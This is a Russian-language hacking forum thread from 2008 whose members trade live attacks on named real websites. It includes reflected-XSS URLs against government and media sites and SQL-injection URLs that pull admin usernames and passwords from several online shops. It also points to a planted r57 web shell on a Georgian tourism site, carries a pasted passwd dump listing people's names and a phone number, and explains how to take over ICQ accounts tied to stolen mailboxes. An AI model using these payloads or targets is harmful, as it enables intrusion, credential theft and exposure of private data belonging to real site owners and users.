Форумы
Правила форума
Сегодняшние посты
Зарегистрироваться Вход Мой профиль Входящие Адресная книга Моя подписка Мои форумы
Выход
Текстовая версия
Список пользователей
Карта
Top-100 пользователей
Календари Ticket List
Фото галерея
ПОИСК
FAQ
RSS:
20 последних сообщений форума 20 последних топиков форума
Пользователи, просматривающие топик:
none
Имя
RE: Раздача слонов II - 16.03.2008 19:55:52
b[e]nder
Сообщений: 194
Оценки: 0
Присоединился: 29.01.2008
9973c2136f6f80e0d1aac6ec24149e29 мне кажется что это хэш
RE: Раздача слонов II - 16.03.2008 19:57:03
b[e]nder
Сообщений: 194
Оценки: 0
Присоединился: 29.01.2008
необязательно использовать sql там есть upload добыть шелл а следовательно и пасс можно другими способами
RE: Раздача слонов II - 20.03.2008 23:19:10
x23r0
Сообщений: 20
Оценки: 0
Присоединился: 04.02.2008
[link=http://www2006.org/programme/item.php?id=%3Csсriрt%3Ealert('sss')%3C/sсriрt%3E]http://www2006.org/programme/item.php?id=%3Csсriрt%3Ealert('sss')%3C/sсriрt%3E[/link]
RE: Раздача слонов II - 20.03.2008 23:48:18
x23r0
Сообщений: 20
Оценки: 0
Присоединился: 04.02.2008
[link=http://www.clasp.org/publications.php?id=-1+union+select+1,2,concat(char(39),password,char(39)),4,5,6,7,8,9,0,11,12,13,14,15+from+user/]http://www.clasp.org/publications.php?id=-1+union+select+1,2,concat(char(39),password,char(39)),4,5,6,7,8,9,0,11,12,13,14,15+from+user/[/link]* clasporg! stuffstuff rrap7 master!
RE: Раздача слонов II - 30.03.2008 22:36:54
Out
Сообщений: 6
Оценки: 0
Присоединился: 06.01.2008
Пассивные xss DUMA.GOV.RU http://www.duma.gov.ru/index.jsp?t="><sсriрt>alert(/byOut/)</sсriрt> LDPR.ru http://www.ldpr.ru/search/?s="><sсriрt>alert(/byOut/)</sсriрt> Оффициальный сайт Первого канала http://www.1tv.ru/owa/win/ort5_shed.shed?p_shed_title_id=131754&p_date="><sсriрt>alert(/byOut/)</sсriрt> Сайт телеканала Россия http://www.rutv.ru/rnews.html?id=130873&d="><sсriрt>alert(/byOut/)</sсriрt> Avaga.ru (хостер) http://partners.agava.ru/cgi/sites/create_site.cgi?project=%22%3E%3Csсriрt%3Ealert(/byOut/)%3C/sсriрt%3E
RE: Раздача слонов II - 31.03.2008 8:27:36
ADiel
Сообщений: 107
Оценки: 0
Присоединился: 14.01.2008
http://plot-ilya.narod.ru/remview.php проверьте пожалуйста, работает ли. буду очень благодарен) а то не работает у меня)))
RE: Раздача слонов II - 31.03.2008 8:45:13
blаcksun
Сообщений: 1682
Оценки: 0
Присоединился: 19.11.2007
Откуда: Тюмень
quote: ORIGINAL: ADiel http://plot-ilya.narod.ru/remview.php проверьте пожалуйста, работает ли. буду очень благодарен) а то не работает у меня))) А-ха-хахаха! php на народ.ру?!
RE: Раздача слонов II - 31.03.2008 9:15:03
ADiel
Сообщений: 107
Оценки: 0
Присоединился: 14.01.2008
не на народе же я его загружаю.)) он вымолняетя на серваке - жертве))) а ваще я ЛОЛ по этой теме, но видео, как грузят с народа ремвьювер видал.
RE: Раздача слонов II - 04.04.2008 16:10:02
archangel23
Сообщений: 3
Оценки: 0
Присоединился: 05.03.2008
хелп, что дальше))) Warning : fopen(../exit.log): failed to open stream: No such file or directory in /www/http/petrochatru/PSBGUI/exit.save.php on line 14 Warning : feof(): supplied argument is not a valid stream resource in /www/http/petrochatru/PSBGUI/exit.save.php on line 16 Warning : fgets(): supplied argument is not a valid stream resource in /www/http/petrochatru/PSBGUI/exit.save.php on line 18
< Сообщение отредактировано archangel23 -- 04.04.2008 17:35:35 >
RE: Раздача слонов II - 04.04.2008 21:20:33
blаcksun
Сообщений: 1682
Оценки: 0
Присоединился: 19.11.2007
Откуда: Тюмень
Дальше ап стену
RE: Раздача слонов II - 19.04.2008 20:25:46
iPower
Сообщений: 11
Оценки: 0
Присоединился: 04.11.2007
Есть один сука сайт, PlayGround.ru - полюбому слышали. вот вам уязвимость одна из хз скольких уязвимостей XSS (пассивок) http://www.playground.ru/?search=">XSS весь сайт просто изъеден XSS))).
< Сообщение отредактировано iPower -- 19.04.2008 20:40:15 >
RE: Раздача слонов II - 29.04.2008 8:50:54
novosibirec
Сообщений: 30
Оценки: 0
Присоединился: 08.04.2008
на ngs.ru кто нить знает какие нить уязвимости!? найти на получается! ((( предпочтительнее xss
RE: Раздача слонов II - 18.06.2008 3:11:43
AKYLA
Сообщений: 7
Оценки: 0
Присоединился: 27.11.2007
Дыра в WEbMail http://nobile.com.ua/webmail/tmp/?M=A позволяет просматривать все папки WebMail сайтов которые находятся на хостинге http://www.x-host.ua/ Там же есть и сайт МВД Крыма )))) и много чего разного около 128 сайтов
RE: Раздача слонов II - 10.08.2008 23:10:56
FreeKing
Сообщений: 31
Оценки: 0
Присоединился: 25.11.2007
ttc.ge/admin/file_upload.php - загрузка и выполнение произволтьных скриптов. Полный контроль над грузинским туристическим сайтом. Там уже залито 2 шелла, например, r57 работает по адресу http://ttc.ge/photos/img.php. Все работает - выполняются произвольные действия с файлами и базой. В силу последних политических событий, дефейсить или делать что-либо противозаконное не стал, и не советую... Ломать там уже нечего - разве что домохозяйкам поэкспериментировать... Пользуйтесь:)
RE: Раздача слонов II - 21.09.2008 20:48:26
bobik23
Сообщений: 130
Оценки: 0
Присоединился: 20.09.2008
а как это рашивровывается с ..... paswordPro или мд5 _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin dapease:*:1001:1001:Andrew Pease:/home/dapease:/usr/local/bin/bash mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin dpease:*:1002:1002:David Pease,,519-925-6412,:/home/dpease:/bin/sh fatguy:*:1003:1003:Fatguy Web Site:/home/fatguy:/bin/sh tonymcmanus:*:1004:1004:Tony McManus:/home/tonymcmanus:/bin/sh otonabee:*:1005:1005:Donna:/home/otonabee:/bin/sh darkcompany:*:1006:1006:Dark Company:/home/darkcompany:/bin/sh funnelweb:*:1000:1000::/home/funnelweb:/bin/sh wareham:*:1007:1007:Darrell Markewitz:/home/wareham:/bin/sh treheima:*:1008:1008:Neil Peterson:/home/treheima:/bin/sh medplan:*:1009:1009:Medplan:/home/medplan:/bin/sh jobrien:*:1010:1010:Joseph O'Brien:/home/jobrien:/bin/sh curzons:*:1011:1011:Curzon Web App:/home/curzons:/usr/local/bin/bash celticharper:*:1012:1012:Tanah Haney:/home/celticharper:/bin/sh magpiedesign:*:1013:1013:Mark Harrison:/home/magpiedesign:/bin/sh lauradesigns:*:1014:1014:Laura
RE: Раздача слонов II - 21.09.2008 23:54:10
StereoniX
Сообщений: 15
Оценки: 0
Присоединился: 17.08.2008
Аналогично :) http://store.rockemfashions.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- http://www.robotfactory.biz/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- http://www.facestixs.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- https://southtownsales.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- http://oc-1dental.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login-- http://nashvillesexywear.com/user/category_search.php?id=-1+union+select+all+1,%20concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login--
RE: Раздача слонов II - 25.11.2008 6:35:51
space56
Сообщений: 73
Оценки: -2
Присоединился: 20.11.2008
Откуда: да
http://icq.com/mail короч если угнали мыло.....можно и угнать асю!проверяем ...в поле ICQ Number or Email вводим емаил который угнали а в поле ICQ Password вводим любой пароль...жмём Login и нам выдаётся номер к которому привязано мыло которое мы вводили
Новые сообщения
Нет новых сообщений
Популярные с новыми сообщениями
Популярные без новых сообщений
Заблокированные с новыми сообщениями
Заблокированные без сообщений
Новое сообщение Ответ Новое голосование Оставить голос Удалить мой пост Удалить мое обсуждение Оценить пост